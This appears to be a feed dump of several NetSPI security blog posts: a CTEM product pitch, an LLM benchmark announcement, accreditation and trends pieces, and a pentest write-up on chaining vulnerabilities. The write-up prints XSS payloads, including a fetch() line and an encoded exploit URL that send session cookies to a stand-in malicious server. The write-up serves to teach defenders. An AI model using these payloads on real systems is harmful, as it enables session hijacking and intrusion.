NetSPI PTaaS delivers a robust pentesting program that includes more than 50 types of pentests that uncover vulnerabilities, exposures, and misconfigurations to help you through the initial processes of CTEM. The NetSPI Platform contextualizes outcomes in real-time, while our experts provide detailed guidance on prioritization and classification of risk. The Platform integrates with many common security tools, so you can accelerate your remediation and quickly close gaps. PTaaS provides additional support through the validation process by retesting to verify remediation effectiveness, and it addresses new threats as they arise. NetSPI PTaaS supports you through all processes of CTEM, so you can proactively reduce risk.

Attack Surface Management (ASM)

NetSPI ASM encompasses External Attack Surface Management (EASM) and Cyber Asset Attack Surface Management (CAASM) to deliver complete visibility into your attack surface, always-on coverage, and deep data context. This can significantly support scoping, discovery, and prioritization processes by identifying and inventorying visible and hidden assets and vulnerabilities, mapping attack paths, and providing deep contextual insights for streamlined remediation. With always-on monitoring and real-time asset and vulnerability updates, you can proactively inventory assets and tackle vulnerabilities as they arise in the evolving threat landscape.

Breach and Attack Simulation (BAS)

NetSPI BAS supports your CTEM program in the discovery, validation, and mobilization processes by testing your security controls to uncover vulnerabilities and misconfigurations against specific threat actors and malware techniques across your environment.  

Our security experts will work alongside you to provide deep context of your vulnerabilities and help prioritize risk. The Platform also helps prioritize, validate, and mobilize threats by providing step-by-step instructions to test, retest, and remediate threats, and by illustrating areas of high risk in a MITRE ATT&CK matrix. With BAS, you can optimize security controls, enhance detection, and track progress over time.

Ready to Bolster Your Proactive Security Journey?

The evolving threat landscape requires a proactive and adaptive approach. Aligning your security operations and processes with CTEM ensures you’re not just reacting to threats, but actively staying ahead of them. Let us help you accelerate your proactive security journey with The NetSPI Platform and our security experts by your side.

The post CTEM Defined: The Fundamentals of Continuous Threat Exposure Management appeared first on NetSPI.

]]>
Balancing Security and Usability of Large Language Models: An LLM Benchmarking Framework https://www.netspi.com/blog/executive-blog/ai-ml-pentesting/balancing-security-and-usability-of-large-language-models-benchmarking-framework/ Mon, 16 Dec 2024 13:45:00 +0000 https://www.netspi.com/?p=26157 Explore the integration of Large Language Models (LLMs) in critical systems and the balance between security and usability with a new LLM benchmarking framework.

The post Balancing Security and Usability of Large Language Models: An LLM Benchmarking Framework appeared first on NetSPI.

]]>
By 2026, Gartner predicts that “80% of all enterprises will have used or deployed generative AI applications.” However, many of these organizations have yet to find a way to balance usability and security in their deployments. As a result, consumer-facing LLM capabilities introduce a new and less understood set of risks for organizations. The mission of this article, along with the first release of the NetSPI Open Large Language Model (LLM) Security Benchmark, is to clarify some of the ambiguity around LLM security and highlight the visible trade-offs between security and usability.

TLDR;

  • Large Language Models (LLMs) have become more integrated into critical systems, applications, and processes, posing a challenge for potential security risks. 
  • Increasing security measures in LLMs can negatively affect usability, requiring the right balance. But these behaviors may be desired depending on the business use case. 
  • Our LLM benchmarking framework shows how different LLMs handle adversarial conditions, testing their jailbreakability, while measuring any impact on usability. 

Security Concerns in Large Language Models

As LLMs become integral to critical systems, the risk of vulnerabilities like model extraction, data leakage, membership inference, direct prompt injection, and jailbreakability increases. Jailbreaking refers to manipulating a model to bypass safety filters, potentially generating harmful content, exposing sensitive data, or performing unauthorized actions.

These vulnerabilities have significant implications. In business, a compromised LLM could leak proprietary information or become an attack vector. In public applications, there is a risk of harmful or biased content causing reputational damage and legal issues. Therefore, ensuring LLM security is crucial, highlighting the need for robust benchmarks to test their resilience against attacks, including jailbreakability.

Balancing Security and Usability

While enhancing security of an LLM is important, usability is equally important. The model should still perform its intended functions effectively. Oftentimes, security and usability is a balancing act. This challenge is well-documented in software and system design – overly strict filters may limit useful responses, while insufficient security poses risks.

LLM Benchmarking Framework 

These challenges and concerns are not going away anytime soon. So, what can be done? We’ve created a benchmarking framework that evaluates both the security and usability of LLMs. Our systematic assessment shows how different LLMs handle adversarial conditions, testing their jailbreakability, while measuring any impact on usability. This dual evaluation helps balance security with functionality, crucial for AI applications in cybersecurity. 

Our intent is that the benchmark can provide some level of transparency so that it can be used by organizations to make more informed choices that better align to their use cases and risk appetite.

While the findings and benchmarks presented in this paper reflect our current understanding of LLM security and usability, it is important to note that this research is part of an evolving body of work. As advancements in model evaluation techniques and security practices emerge, we expect to refine and expand upon these benchmarks. We encourage feedback and constructive critique from readers, as it will help to further improve the robustness and comprehensiveness of our methodology. We remain committed to ensuring that these evaluations continue to meet the highest standards as the field develops.

We invite you to participate in this research and contribute your insights to the paper, helping shape the future of AI security.

The post Balancing Security and Usability of Large Language Models: An LLM Benchmarking Framework appeared first on NetSPI.

]]>
From Informational to Critical: Chaining & Elevating Web Vulnerabilities https://www.netspi.com/blog/technical-blog/web-application-pentesting/uncovering-a-critical-vulnerability-through-chained-findings/ Tue, 10 Dec 2024 22:00:00 +0000 https://www.netspi.com/?p=26128 Learn about administrative access and Remote Code Execution (RCE) exploitation from a recent Web Application Pentest.

The post From Informational to Critical: Chaining & Elevating Web Vulnerabilities appeared first on NetSPI.

]]>
As a Security Consultant II at NetSPI, I’ve had the opportunity to dig into a variety of security issues during engagements, ranging from simple misconfigurations to complex attack chains. One recent project gave me the opportunity to uncover a critical vulnerability by chaining multiple findings together. This turned an initially informational issue into a high-severity, exploitative scenario. This blog will detail the steps I took, the vulnerabilities I found, and show how a seemingly benign misconfiguration led to full administrative access and exploitation of remote code execution (RCE). 

Read more from the author: CVE-2024-37888 – CKEditor 4 Open Link Plugin XSS

Setting the Scene: The Applications and Their Vulnerabilities

During the engagement, we had multiple applications in scope. All the applications were running on the same hostname, but on different ports. For simplicity, I’ll be referring to three of them as applications A, B, and C: 

Host: example.com 

  • Application A: example.com:1111 
  • Application B: example.com:2222 
  • Application C: example.com:3333 

All of the applications used the Authorization Header for authentication. 

Note that Application B has been mentioned below as a reference to show its similarity with Application C and does not directly take part in the exploit chain. 

Here’s a brief overview of the application configurations and vulnerabilities: 

  1. Application A: Vulnerable to Reflected Cross-Site Scripting (XSS) that could not be exploited for session hijacking due to HttpOnly flags on cookies and lack of session-based authentication. 
  2. Application B: Vulnerable to File Upload Remote Code Execution (RCE), rated as High Severity, but required an Admin account for exploitation. Additionally, there were sensitive Spring Boot actuator endpoints exposed, which also required admin privileges for exploitation. 
  3. Application C: Similar to Application B in terms of the RCE vulnerability and sensitive Spring Boot actuator exposure. The only interesting fact here was that the application also supported session-based authentication in addition to authorization header-based authentication. 

What made this scenario interesting was the Weak Configuration – Cross-Application Cookie Exposure on Different Ports vulnerability, a newly identified finding that I had just added to my testing methodology. All three applications were running on the same host (example.com), but on different ports, and they shared the same domain. While this might seem harmless at first, it created a security gap.

The issue stemmed from the fact that all applications were sharing the same cookie storage on the client side. This led to an Informational Severity finding, due to the way cookies were scoped to the parent domain (i.e., example.com). While each application had its own port, they were all vulnerable to Cross-Application Cookie Exposure, a scenario where cookies could be leaked between the different applications running on the same domain. 

Although important, this finding did not initially have a major impact, because none of the applications depended on session-based authentication. However, that changed when I noticed something unusual in Application C.

A Lightbulb Moment: Session-Based Authentication in Application C 

Unlike Applications A and B, Application C supported both Authorization Header-based authentication (like the other two applications) and Session-based authentication. During the login process, Application C sends a request to /rest/v1/authenticate with the Authorization header, and in response, it issues a valid JSESSIONID session cookie which can be used for authentication in subsequent requests.

HTTP Request:

POST /rest/v1/authenticate HTTP/1.1 
Host: example.com:3333 
Authorization: Basic [REDACTED] 

HTTP Response:

HTTP/1.1 200  
Set-Cookie: JSESSIONID=B7223B56E59AEED6E0FF8A8880C05447; Path=/; Secure

The interesting part? The JSESSIONID cookie lacks the HttpOnly flag, which was a major red flag, especially when compared to the cookies issued by Applications A and B, both of which had the HttpOnly flag set. 

This discovery was pivotal. I could now attempt to hijack Application C’s session using the XSS vulnerability in Application A. However, there were several hurdles to overcome. 

The first challenge was that Application A also issued a session cookie with the same name (JSESSIONID), which would overwrite the session cookie from Application C in the client’s cookie storage. Application A’s JSESSIONID contained the HttpOnly flag, and since this flag prevented JavaScript access to the cookie, the XSS payload in Application A could not directly access the JSESSIONID. 

Luckily, there was a workaround. Application C made periodic AJAX requests to /rest/v1/authenticate every 2-3 seconds to keep the session alive. If an invalid JSESSIONID was included in these requests, Application C would re-authenticate and issue a new session cookie. This behavior allowed me to force Application C to overwrite the JSESSIONID cookie after it was initially replaced by the one from Application A.

The next challenge was to figure out how to access the cookie. Initially, the XSS payloads did not give me access to the cookie and instead triggered an alert with =undefined

The issue was that when I visited Application A with my payload, the JSESSIONID cookie from Application C was rejected by the server, and a new cookie (with the HttpOnly flag) was issued by Application A. 

However, after 2-3 seconds, when Application C issued its new session cookie, the cookie storage was updated, and I was able to access the session cookie without the HttpOnly flag from Application C only via the console using document.cookie. 

I attempted various delay methods to give the session cookie of Application C time to load, such as: 

<script>window.onload=alert(document.cookie)</script> 

<script>document.onload=alert(document.cookie)</script> 

<script>document.addEventListener("DOMContentLoaded", (event) => {alert(document.cookie)});</script>

Nothing worked. I was about to give up when I noticed something crucial—the overwriting of the JSESSIONID cookie from Application C didn’t happen instantaneously. It took a few seconds for the cookie to be updated. So, I decided to add a 5-second delay before executing my payload: 

<script>setTimeout(() => { alert(document.cookie) }, 5000)</script>

This worked perfectly! I was able to access the JSESSIONID cookie issued by Application C, and I quickly crafted a stealthy payload to steal it: 

<script>setTimeout(()=>{fetch('https://my-malicious-server.com?cookie='+document.cookie).then()},5000)</script> 

I encoded the URL to bypass any server restrictions and crafted the final exploit URL: 

https://example.com:1111?id=<script>setTimeout%28%28%29%3d>%7bfetch%28%27https%3a%2f%2fmy-malicious-server.com%3fcookie%3d%27%2bdocument%2ecookie%29%2ethen%28%29%7d%2c5000%29<%2fscript> 

Once the victim clicked the link, the cookie value was exfiltrated to my server.

Escalating the Impact 

At this point, I had successfully hijacked the session cookie for Application C and had admin access. Application C was also vulnerable to an RCE and had sensitive Spring Boot actuators exposed. Using the stolen session cookie, I was able to exploit these vulnerabilities and gain full access to the backend server hosting all the applications. 

Bumping Up the Severity 

Initially, the Weak Configuration – Cross-Application Cookie Exposure finding had been rated as Informational due to its lack of immediate impact. However, by chaining it with other vulnerabilities, such as the XSS and the absence of the HttpOnly flag on Application C’s session cookie, I was able to escalate the finding to Critical severity. 

This chain of attacks allowed me to exploit the Remote Code Execution (RCE) vulnerability without requiring Admin privileges by hijacking the session. This turned an otherwise harmless misconfiguration into a full-fledged critical risk. 

Full Attack Chain

Conclusion 

This engagement was a perfect example of how multiple vulnerabilities in seemingly unrelated applications can be chained together to create a critical security risk. What started as an informational finding became a full-blown exploit chain, ultimately leading to administrative access on Application C and exploitation of Remote Code Execution.

The lesson? Never underestimate the potential impact of a simple misconfiguration. Even seemingly minor issues can lead to devastating consequences when combined with other vulnerabilities. 

The post From Informational to Critical: Chaining & Elevating Web Vulnerabilities appeared first on NetSPI.

]]>
Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation https://www.netspi.com/blog/executive-blog/compliance/an-inside-look-at-crest-accreditation/ Thu, 05 Dec 2024 10:56:19 +0000 https://www.netspi.com/?p=26115 Explore the role of CREST accreditation in cybersecurity, its link to DORA, and insights from Jonathan Armstrong on its future in the security industry.

The post Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation appeared first on NetSPI.

]]>
Accreditations play a vital role in enabling cybersecurity providers to demonstrate their organisational capabilities and expertise. One prominent example is the CBEST Accreditation. Achieving CBEST-approved status and utilizing testers with CREST certifications signifies that an organisation and its security practitioners have evidenced the highest level of skills and capabilities required to deliver specialized testing services in the financial sector.  

CREST has recently gained significant attention due to its alignment with the Digital Operational Resilience Act (DORA). This legislation aims to enhance the operational resilience of financial entities operating within the European Union (EU). Set to take effect on 17 January 2025, DORA mandates rigorous testing protocols carried out by highly qualified and experienced professionals, including those certified by CREST. 

To dive deeper into the importance of CREST, we spoke with Jonathan Armstrong, Head of Accreditation at CREST. He shares insights into why companies seek accreditation, the skills required to achieve this, and what the future holds for accreditation in the security industry.

The responses below are direct quotes from Jonathan Armstrong.

The Value of Earning CREST Accreditation

1. As cyberattacks are on the increase, we’re seeing a corresponding increase in vendors wanting and needing the necessary accreditations to fulfil this demand from end customers. What does having CBEST accreditation mean?

CBEST accreditation provides the highest level of assurance for vendors offering cyber resilience services to the financial sector. It demonstrates that the organisation has not only a solid operational foundation, but also a proven history of delivering high-quality services. To achieve this accreditation, vendors must also employ professionals with the highest CREST certifications, ensuring that skilled experts operate within well-structured, well-governed environments. This combination of technical expertise and strong governance gives financial institutions confidence that these providers can handle the most sophisticated and critical security challenges.

2. What are some of the specific values that CREST brings? 

Since its inception in 2006, CREST has grown into a global leader in the cybersecurity community. By collaborating with our members and their technical experts, we have earned a reputation for setting and maintaining industry-recognised standards across a wide range of cybersecurity disciplines.

Our mission is at the heart of everything we do: we develop and measure the capabilities of the cybersecurity industry, work to expand the pipeline of skilled professionals, and set global standards to ensure consistently high-quality services.

Our mission is at the heart of everything we do: we develop and measure the capabilities of the cybersecurity industry, work to expand the pipeline of skilled professionals, and set global standards to ensure consistently high-quality services. Through active engagement with the global cybersecurity community, we leverage shared knowledge and expertise for the benefit of the entire industry.

3. How difficult is it to attain CBEST accreditation? Walk us through the typical stages of the process.

Attaining CBEST accreditation is a challenging process that requires organisations to undergo multiple assessments, including several levels of validation and verification. Organisations must also demonstrate a proven track record of delivering services to the financial sector, ensuring they are well acquainted with the unique challenges in this space. Not forgetting that employees must maintain their individual certifications, proving that they not only possess the necessary skills, but are continually keeping them up-to-date.

4. How does CREST prioritise the importance of organisational accreditation compared to the qualifications of individual professionals within the organisation?

CREST recognises the crucial role that both organisational accreditation and individual certifications play in delivering high-quality cybersecurity services. For optimum assurance, both elements must be carefully considered and integrated.

While skilled professionals provide a strong level of technical assurance, they must operate within mature organisational structures that have well-defined processes and practices, ensuring transparency, consistency, and reliability.

While skilled professionals provide a strong level of technical assurance, they must operate within mature organisational structures that have well-defined processes and practices, ensuring transparency, consistency, and reliability. Organisational accreditation serves as the foundation upon which these individual skills can be fully leveraged and utilised. 

Additionally, while buyers are naturally concerned with the expertise of individual testers, it is equally important to ensure that the organisation has the commercial capability to support its services. This includes financial stability, robust technical controls, and appropriate commercial insurances to safeguard against any potential issues. 

All about Digital Operational Resilience Act (DORA)

5. Everyone seems to be talking about DORA. What are the top benefits this will bring to financial entities, and the wider security landscape, in 2025?

At the heart of the CREST mission is consistency, and that’s why I see the top benefit of DORA in 2025 as the introduction of a unified and consistent framework across the EU. This will allow financial institutions to demonstrate compliance across multiple member states, eliminating the need to navigate varying regulatory standards. 

At the heart of the CREST mission is consistency, and that’s why I see the top benefit of DORA in 2025 as the introduction of a unified and consistent framework across the EU.

The inclusion of third-party providers under this framework is equally important. It aligns with the broader understanding that, in order to be secure, we must defend as one. By bringing service providers into the fold, DORA strengthens the entire ecosystem, ensuring that resilience is built collaboratively across both financial institutions and their partners.

6. How can companies prepare for operational resilience testing, especially if they don’t have a regulatory body overseeing them currently?

A core part of CREST’s mission is collaboration, and this applies directly to preparing for operational resilience testing. Even if a company does not have a regulatory body overseeing them, they can proactively prepare by working with experienced external providers who hold industry-recognised certifications, such as those under the CBEST framework. These providers bring invaluable insights from real-world testing scenarios, ensuring that companies benefit from best practices that have already been tried and tested in highly regulated environments. 

Companies could start by conducting a thorough internal assessment of their current resilience capabilities, focusing on key areas like incident response, system recovery, and business continuity. Engaging with external experts early in this process could be valuable helping companies to identify gaps and strengthen their operational resilience before regulatory scrutiny.

7. How do you think accreditations, security frameworks, and regulatory bodies will shape cybersecurity over the next 12 months?

At CREST, we are uniquely positioned within the global cybersecurity landscape, engaging with national regulators, authorities, and key stakeholders worldwide. While each country faces distinct challenges based on their local market needs, the core cybersecurity threats remain similar across borders. From our perspective, there is an increasing focus on using accreditation as a driver for both capacity and capability growth within the industry. This reflects a broader trend towards formalising cybersecurity practices and ensuring quality assurance through standardised frameworks.

In response to these needs, we recently launched the CREST Cyber Accelerated Maturity Programme (CREST CAMP), a pivotal initiative initially funded by the UK Foreign, Commonwealth and Development Office (FCDO). CREST CAMP is designed to accelerate the maturity of cybersecurity service providers in regions that have identified a need to improve their local cybersecurity ecosystems. Through targeted mentoring, training, and guidance, CREST CAMP supports companies on their journey towards professionalisation and full accreditation.

CREST CAMP is designed to accelerate the maturity of cybersecurity service providers in regions that have identified a need to improve their local cybersecurity ecosystems.

This initiative marks a significant shift in how development funds are being directed, with a growing recognition of the private sector’s critical role in national security. Governments increasingly rely on private sector expertise to address resource shortfalls, while the broader economy depends on high-quality private sector cybersecurity providers to function securely. We expect accreditation to continue being a key mechanism in building resilience and trust within global cyber ecosystems, helping both public and private sectors bolster their security posture.

Conclusion

CBEST and CREST are crucial accreditations for cybersecurity providers, particularly in the financial sector, as they ensure the highest level of capability and operational assurance. With the upcoming DORA regulation taking effect in January, CREST’s role is becoming increasingly significant, as a mechanism to identify high quality and capable providers. Accreditations will play a crucial role in advancing cybersecurity practices, fostering resilience and trust throughout the global cyber ecosystem.  

The post Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation appeared first on NetSPI.

]]>
2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust https://www.netspi.com/blog/executive-blog/security-industry-trends/2025-cybersecurity-trends/ Tue, 03 Dec 2024 15:00:00 +0000 https://www.netspi.com/?p=26105 Explore how 2025’s biggest cybersecurity trends—AI-driven attacks, deepfakes, and platformization—are reshaping the security landscape.

The post 2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust appeared first on NetSPI.

]]>
The cybersecurity landscape is always changing, and 2025 is a continuation of this evolution. With emerging threats like AI-driven attacks, deepfakes, and post-quantum cryptographic vulnerabilities, organizations face an increasingly complex and high-stakes digital environment.  

We see this rapidly changing threat landscape as an opportunity. An opportunity to rethink resilience, innovation, and accountability in cybersecurity. The coming year will demand organizations to prioritize proactive strategies, seamless collaboration, and smarter, more integrated solutions that can keep pace with modern risks. 

By anticipating the trends and innovations shaping the future, NetSPI’s 2025 cybersecurity predictions explore how the industry will redefine cybersecurity, empowering businesses to stay ahead in the fight for digital resilience. 

Hear from security experts across NetSPI, including:  

NetSPI’s 2025 Cybersecurity Predictions 

Aaron Shilts
CEO 

Consolidation and platformization gain momentum  

“In 2025, the platformization trend will continue to gain momentum as cybersecurity executives remain focused on the effectiveness of their technology stack and service providers. This will drive a greater shift towards fewer, more comprehensive solutions that reduce management complexity and enhance team productivity.  

With cyber threats growing more complex and frequent, CISOs are under immense pressure to ensure that their teams can respond rapidly and decisively. To address this, in the coming year, they will focus on quality over quantity, favoring vendors that deliver integrated, streamlined platforms over a multitude of point solutions that are expensive and resource-intensive to manage. Consolidation will enable cybersecurity teams to work within a unified ecosystem, simplifying data management, minimizing redundancies, and reducing vendor fatigue—which can lead to critical information being overlooked. As security teams seek to reduce noise and increase efficiency, platforms offering broader functionality without the bloat of fragmented solutions will stand out, ultimately empowering teams to concentrate on the highest-priority risks.” 

“Consolidation will enable cybersecurity teams to work within a unified ecosystem, simplifying data management, minimizing redundancies, and reducing vendor fatigue—which can lead to critical information being overlooked.”

The rise of real-time, comprehensive attack surface management (ASM) 

“In 2025, the demand for comprehensive ASM solutions will drive significant consolidation within cybersecurity platforms. Organizations are increasingly focused on gaining real-time, holistic visibility into their digital assets—whether external, internal, or cloud-hosted. For today’s security teams, the source of an asset is less critical than understanding its role and risk within the broader ecosystem. As a result, the cybersecurity market will shift toward unified platforms that provide clear, real-time visibility across the entire asset landscape, eliminating the need for fragmented, asset-specific solutions that can create data silos and impede response times.” 

Nabil Hannan
Field CISO

Landscape shift toward CISO accountability 

“I anticipate that in 2025, we will see a shift in the CISO accountability landscape and how these leaders are held responsible when data breaches and cyberattacks occur.  

First, security will be increasingly viewed as a business-wide responsibility in the coming year, with proper definitions of which departments are responsible for which aspect of security. For example, IT is responsible for the infrastructure, HR manages employee security awareness, and so forth.  

Second, the CISO role will become more collaborative and advisory to other departments, with the CISO sharing their security expertise to assess, prioritize, mitigate, and/or accept risk.  

“The CISO role will become more collaborative and advisory to other departments, with the CISO sharing their security expertise to assess, prioritize, mitigate, and/or accept risk.”

Finally, CISOs will increasingly have a seat at the table to ensure that security decisions are being made in proper business alignment with the relevant business goals, with a focus on proactive risk management.  

Security needs to be weaved into the day-to-day operations of the business, instead of being the sole responsibility of the CISO. Building a culture of security across the organization will need to be a critical focus in 2025.”

Tom Parker

Tom Parker
CTO

Downfall of present-day encryption 

“Over the next several years, attackers will increasingly leverage artificial intelligence (AI) and machine learning (ML) to both introduce new attack techniques and accelerate existing ones. As a result, cyber companies will seek to implement products to detect and respond to both conventional and AI-based threats, resulting in an arms race, where adversarial AI is pitched against defensive AI. Additionally, we will likely see the downfall of present-day encryption, used to protect much of the internet – namely SSL. Companies should prepare for this, by taking inventory of their SSL attack surface for critical applications, to evaluate compensating controls.” 

“Additionally, we will likely see the downfall of present-day encryption, used to protect much of the internet – namely SSL. Companies should prepare for this, by taking inventory of their SSL attack surface for critical applications, to evaluate compensating controls.”

Patrick Sayler

Patrick Sayler
Director of Social Engineering

Vishing will gain popularity among threat actors 

“Vishing was on the rise throughout 2024, and this will continue into 2025 as deepfakes and voice cloning technology becomes more accessible. Phishing protections are becoming increasingly more robust – for example, mail filters are smarter about the content they let through, and identity providers have started to enforce stricter default controls. However, live, real-time interaction introduces several layers to an attack that simply aren’t present when a victim is reading text in an email. Hearing the emotion and intention behind a voice can disarm an individual, putting them on the spot and causing them to think less critically about the situation. Vishing detection tools will need to evolve to keep pace, adopting advanced techniques, like voice pattern recognition and behavioral analysis, to accurately identify and prevent these threats.” 

AI lowers the barrier of entry but results in less sophisticated attacks  

“Specific tactics and pretexts used by threat actors will largely remain the same throughout the next 12 months. Phishing toolkits will capture credentials and hijack user sessions, and phone calls to support teams will still result in an account compromise through a simple password reset. Instead, I predict that some attacks may devolve in 2025, driven by the commoditization of AI. The increased availability of AI tools has significantly lowered the barrier to entry and has given anyone the ability to become an effective social engineer. Entire emails can be generated by large language models from a single sentence prompt, and voices can be cloned from mere seconds of speech.  

“The increased availability of AI tools has significantly lowered the barrier to entry and has given anyone the ability to become an effective social engineer. Entire emails can be generated by large language models from a single sentence prompt, and voices can be cloned from mere seconds of speech.”

As a result, this could lead to a trend of less sophisticated attacks executed by groups that may not be trained – or even interested in – establishing long-term persistence in an internal environment. These threat groups would be driven by the immediate wins they see by “dumpster diving” and exposing customer data, internal communications, and company secrets. So while the attacks may be easier to detect and investigate from an incident response perspective, the reputational hit from such a breach could ultimately be more damaging in the long run.” 

Kurtis Shelton
Principal AI Researcher – AI/ML Penetration Testing (AML) Service Lead 

Agentic AI will continue to redefine security strategies  

“In the coming year, agentic AI is poised to significantly transform security strategies by enhancing both proactive and reactive measures. Autonomous agents will likely be used to monitor networks for threats, identify vulnerabilities before exploitation, and respond to incidents in real-time with minimal human intervention. They may dynamically adjust security rules based on evolving threat patterns or autonomously quarantine compromised systems, greatly reducing response times. 

“However, the rise of these autonomous agents will also introduce new risks, as they themselves can become targets for attacks.”

However, the rise of these autonomous agents will also introduce new risks, as they themselves can become targets for attacks. If compromised, they could inflict considerable damage to an organization due to their limited oversight. Future security strategies will need to focus on robust defenses against adversarial AI, emphasizing the importance of explainability, continuous monitoring of decision-making processes, and adherence to strong security principles to ensure that these systems remain secure and trustworthy in a rapidly evolving threat landscape.” 

AI will become an active decision-maker, shaping the future of accountability and misinformation control 

“Looking toward 2025, AI systems are set to gain greater autonomy in decision-making, driven by advancements in reinforcement learning and multi-agent systems. As AI evolves from passive tools to active decision-makers, transparent accountability frameworks will become essential, particularly in fields like cybersecurity, supply chain management, and customer service. 

At the same time, AI’s role in addressing misinformation will become even more critical. As synthetic media and deepfakes grow increasingly sophisticated, AI will be indispensable not only for generating but also for detecting misinformation. By 2025, we can expect a surge in AI-driven tools for verifying content authenticity, bringing greater focus to media literacy. With AI’s widening societal impact, regulatory bodies will require strict adherence to standards for fairness, bias reduction, and reliability, challenging organizations to balance innovation within these evolving frameworks.” 

Maril Vernon
Solutions Architect 

Collaborative threat simulation 

“Right now, the security industry doesn’t benefit from what law enforcement figured out a long time ago: information sharing catches bad guys.”

“Right now, the security industry doesn’t benefit from what law enforcement figured out a long time ago: information sharing catches bad guys. In 2025, I anticipate the security industry will see more collaborative simulations, where multiple organizations share anonymized attack data to improve collective defenses. This will be a key component in preventing supply chain attacks. However, prevention is only one pillar of resilience – organizations still need to identify, respond, and adapt. It’s believed that it’s shameful and taboo to experience a breach, but sharing with the community how it happened, what evaded detections, how effective–or ineffective–the response was, and what was done to adapt to future attacks will help everyone with the “adapt” piece of resilience.” 

Evolution of threat modeling 

“In 2025, threat modeling will have to expand and adapt to account for new areas like post-quantum cryptography and AI-specific vulnerabilities. Given the increased prevalence of AI, I anticipate a growing emphasis on API security and data strategies in threat modeling.  

“While there will be a stronger push toward automated threat modeling tools over the course of the next year, it’s important to recognize that threat modeling is fundamentally a collaborative, human exercise.”

While there will be a stronger push toward automated threat modeling tools over the course of the next year, it’s important to recognize that threat modeling is fundamentally a collaborative, human exercise. It involves thinking through complex attack paths, understanding nuanced business logic, and considering unique threats based on the organization’s specific architecture and environment—all of which require human reasoning. Automated tools may help reduce manual overhead next year, but I predict they will serve more as assistants rather than replacements for human-driven threat modeling.” 

Karl Fosaaen
Vice President of Research 

Continuous assessment in the cloud will enhance overall security posture 

“As we continue to embrace cloud solutions and remote work, the attack surface continues to expand. Remote work infrastructure introduces unique complexities that can be difficult to manage, so it must be properly designed, deployed, and secured to strike the balance between usability and security. By leveraging innovative technologies and continuous assessment, organizations can not only reduce their attack surface but also bolster their overall security posture in an increasingly challenging digital landscape. Looking ahead to 2025, I anticipate that we’ll see advancements in cloud security tools that could significantly enhance organizations’ ability to protect themselves from emerging threats. 

“Remote work infrastructure introduces unique complexities that can be difficult to manage, so it must be properly designed, deployed, and secured to strike the balance between usability and security.”

Further, while detection and alerting capabilities have improved, many organizations still lack critical indicators in their logs that should prompt actionable responses. This will be a key area for innovation in the upcoming year, as developments have already emerged in the cloud attack detection space to help organizations better recognize and respond to potential threats.” 

2025 will redefine the cybersecurity landscape, bringing both challenges and opportunities with it. From the rise of AI-driven threats and deepfakes to the increasing importance of integrated security solutions, organizations must adapt quickly to stay secure. Consolidating tools, fostering collaboration, and adopting real-time visibility into attack surfaces will be key to navigating this complex environment.  

By proactively addressing these trends and integrating strategies, organizations must not only defend against emerging threats, but also position themselves for long-term resilience. At NetSPI, we’re committed to empowering businesses with the tools and insights they need to thrive in this dynamic digital age.  

Discover how The NetSPI Platform can revolutionize your approach to security, offering advanced, proactive solutions to safeguard your organization. Take the first step toward redefining your security strategy for 2025 and beyond. 

The post 2025 Cybersecurity Trends That Redefine Resilience, Innovation, and Trust appeared first on NetSPI.

]]>
The Attack Surface is Changing – So Should Your Approach https://www.netspi.com/blog/executive-blog/attack-surface-management/the-attack-surface-is-changing-so-should-your-approach/ Tue, 26 Nov 2024 15:00:00 +0000 https://www.netspi.com/?p=26098 Discover the pitfalls of DIY attack surface management and why NetSPI's solutions offer superior security and efficiency.

The post The Attack Surface is Changing – So Should Your Approach appeared first on NetSPI.

]]>
The attack surface is rapidly changing, especially when it comes to external assets. New threats emerge daily and employees increasingly use new tools and services unknown to IT departments, increasing risk exposure. This has made security organizations more focused on finding ways to better manage their growing attack surface. Security teams employ numerous strategies to address this challenge. The first step is often a simple one: a spreadsheet. 

Is a Spreadsheet Enough for Attack Surface Visibility? 

A spreadsheet is the common first step in attempting to gain visibility of all external-facing assets. Essentially, security teams run a few asset discovery or vulnerability scans, build API integrations, pull all the assets found into a single spreadsheet, possibly add some sort of categorization or other information, and boom!  

My attack surface is now managed, right? 

Although this may work in the short-term for some smaller organizations, it quickly turns into a full-time job for individuals already stretched too thin.  

Which areas of our network need to be scanned? How often should we run scans? How do we duplicate the information? How do I reduce false positives? Which vulnerabilities do I prioritize? And this list goes on.  

An accurate and updated inventory of your attack surface assets and vulnerabilities becomes even more complicated once your organization starts growing and adds even more network segments. 

Security professionals may believe this manual approach will provide an inventory of assets and improve the security of those assets for relatively low costs, when it is actually labor-intensive, time-consuming, and often incomplete. Discovering assets is one thing, but keeping up with the changes, associated risks, and potential exposures is another. Trying to figure out which data points to collect, building integrations, normalizing the data, validating and prioritizing findings, and then turning it into usable information is a difficult challenge that comes with large labor costs. 

While it’s possible to do, the spreadsheet approach involves considerable trial and error, extensive documentation reading, and inherent gaps. Consequently, this often leads the team to explore alternative solutions via third-party vendors, and oftentimes that involves cobbling together more than one solution. 

Challenges with Fragmented Technology for Managing the Attack Surface 

Security teams use a combination of third-party vendor technologies, such as security tools, inventory tools, cloud tools, and many more, paired with a spreadsheet or database to piece together the discovery and security of their attack surface. Each of these individual solutions provides valuable information and is an improvement from a spreadsheet approach, but they also come with some drawbacks and inefficiencies. Some common examples include: 

Security Tools 

Common security tools include vulnerability scanners or security rating tools. They are good for discovering and reporting on the vulnerabilities within the assets you tell them to scan. The challenge with relying on a vulnerability scanners and security rating tools are that they only scan what they are told to scan, leaving unknown assets untested and potentially at risk. These solutions also have limited capabilities for noise reduction and contextualization, which lead to additional labor costs to validate and prioritize the findings they deliver. 

Inventory Tools 

Inventory tools and configuration management databases (CMDB) are other common technology categories to help manage an organization’s attack surface. They focus on creating and maintaining a database of the company’s assets to assist with the lifecycle management for IT teams. They are really focused on tracking known assets, not finding new assets or the vulnerabilities within them. These are static tools, designed to help IT teams track known assets and their IT configurations, however, they leave out critical information that security teams need. 

Cloud Tools 

Cloud security posture management (CSPM) tools are common tools focused on cloud environments, ensuring that cloud resources are properly configured and compliant with desired standards. With the shift to the cloud, this is a key area many security teams focus on; however the cloud is only a portion of an organization’s attack surface, leaving gaps in complete visibility.

Clarifying CAASM vs EASM and Related Security Solutions

